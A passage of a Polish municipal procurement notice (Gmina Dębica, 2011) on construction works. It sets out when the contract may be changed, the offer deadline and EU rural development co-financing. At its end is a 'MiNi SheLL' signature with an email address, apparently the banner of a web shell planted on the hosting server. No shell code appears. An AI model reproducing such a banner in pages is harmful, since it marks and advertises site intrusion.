b)  wystąpienia robót dodatkowych, określonych w art.67 ust.1 pkt.5 litera b)ustawy Prawo zamówień publicznych oraz 
      w przypadkach określonych w pkt.2)
           c)  wstrzymania robót przez właściwy organ z przyczyn nie zawinionych przez Wykonawcę, np. dokonanie
 odkrywki archeologicznej, odkrycie niewybuchu, itp.
d)  wystąpienia niekorzystnych warunków atmosferycznych, potwierdzonych przez IMiGW, uniemożliwiających 
               dochowanie wymogów technicznych i technologicznych tj. : 
  - temperatury otoczenia poniżej - 10 ° C utrzymującej się przez minimum 3 dni,
  - ciągłych opadów, trwających minimum 3 dni ,przekraczających średnie opady na danym terenie .
e)  wystąpienia osuwisk gruntu nie ustalonych w oparciu o dokonane badania geologiczne lub występujące ponad
     normy, dotyczy również wystąpienia innych, nie dających się przewidzieć zjawisk geologicznych i hydrologicznych
     pojawiających się w trakcie budowy,
        
2) zakresu i sposobu wykonania przedmiotu zamówienia w uzgodnieniu z Wykonawcą w przypadku :
   a)  zaistnienia istotnych okoliczności powodujących, że wykonanie umowy w zakresie przewidzianym w dokumentacji
        projektowej nie jest możliwe, czego nie można było przewidzieć w chwili zawarcia umowy.
          b)  zmiany przepisów powodujących konieczność przyjęcia innych rozwiązań technicznych  poszczególnych elementów 
               obiektu niż przewidzianych w dokumentacji projektowej,
           c) zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie
               publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
        3)   Innych postanowień umowy w przypadku  zmiany nazwy zadania,
        4) Warunkiem dokonania zmian  określonych w ust.2 pkt.1 jest wpływ ich przyczyn, na dochowanie terminu wykonania
              robót.
3.	Możliwa jest zmiana umowy dotycząca powołania kierownika robót budowlanych (§ 7 ust.3 umowy) oraz ustanowienia przez
       Zamawiającego inspektora nadzoru inwestorskiego (§ 7 ust.1 umowy)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugdebica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dębica, 39-200 Dębica,  ul. Stefana Batorego 13 - pokój 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2011 godzina 10:00, miejsce: Urząd Gminy Dębica, 39-200 Dębica,  ul. Stefana Batorego 13 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze środków: Europejskiego Funduszu Rolnego w ramach działania -Odnowa i Rozwój Wsi- objętego Programem Rozwoju Obszarów Wiejskich  na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com